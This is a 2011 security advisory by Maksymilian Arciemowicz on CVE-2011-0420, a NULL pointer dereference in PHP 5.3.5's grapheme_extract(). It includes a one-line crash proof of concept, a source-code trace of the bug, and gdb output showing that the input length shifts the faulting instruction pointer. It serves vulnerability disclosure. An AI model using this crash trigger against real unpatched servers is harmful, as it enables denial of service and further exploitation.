[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]
Author: Maksymilian Arciemowicz Date: - - Dis.: 09.12.2010 - - Pub.: 17.02.2011
CVE: CVE-2011-0420 CERT: VU#210829
Affected Software: - - PHP 5.3.5
Fixed: SVN
Original URL:
- --- 0.Description --- Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts.
grapheme_extract — Function to extract a sequence of default grapheme clusters from a text buffer, which must be encoded in UTF-8.
- --- 1. PoC for grapheme_extract() --- grapheme_extract('a',-1);
Change length of first parameter to change rip.
- --- 2. grapheme_extract() NULL Pointer Dereference --- As we can see in grapheme_extract(str,size)
- -grapheme_extract()-- ... if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) { <=== str='a' and size='-1' ... /* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done. (size + 1 because the size-th character might be the beginning of a grapheme cluster) */
if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) { <=== ( size=-1+1=0 ) === long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1 if ( NULL != next ) { ZVAL_LONG(next, start+nsize); } RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT } ... - -grapheme_extract()--
if we call to grapheme_ascii_check(pstr,0) where
- -grapheme_ascii_check()-- /* {{{ grapheme_ascii_check: ASCII check */ int grapheme_ascii_check(const unsigned char *day, int32_t len) <==== len=0 { int ret_len = len; while ( len-- ) { if ( *day++ > 0x7f ) return -1; }
return ret_len; <=== return 0 } - -grapheme_ascii_check()--
then we get (int)0 in result and
long nsize = ( size < str_len ? size : str_len );
will be -1. Therefore,
RETURN_STRINGL(((char *)pstr), nsize, 1);
give NULL pointer dereference here.
Changing length of first parameter of grapheme_extract(), we will also change rip in memcpy(3).
(gdb) r -r 'grapheme_extract('a',-1);' ... (gdb) x/i $rip => 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi) (gdb) x/x $rax 0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70 (gdb) x/x $rdi 0x11b2000: Cannot access memory at address 0x11b2000 (gdb) r -r 'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' ,-1);' ... (gdb) x/i $rip => 0x7ffff5511d77 <memcpy+743>: mov 0x18(%rsi),%r10 (gdb) x/x $rsi 0x11b1fe8: 0x00000000
- --- 3. Fix --- CVS
- --- 4. Greets --- Pierre, Stas, sp3x, infospec
- --- 5. Contact --- Author: Maksymilian Arciemowicz [ ]
Email: - - cxib {a\./t]securityreason[d=t} com
GPG: - -
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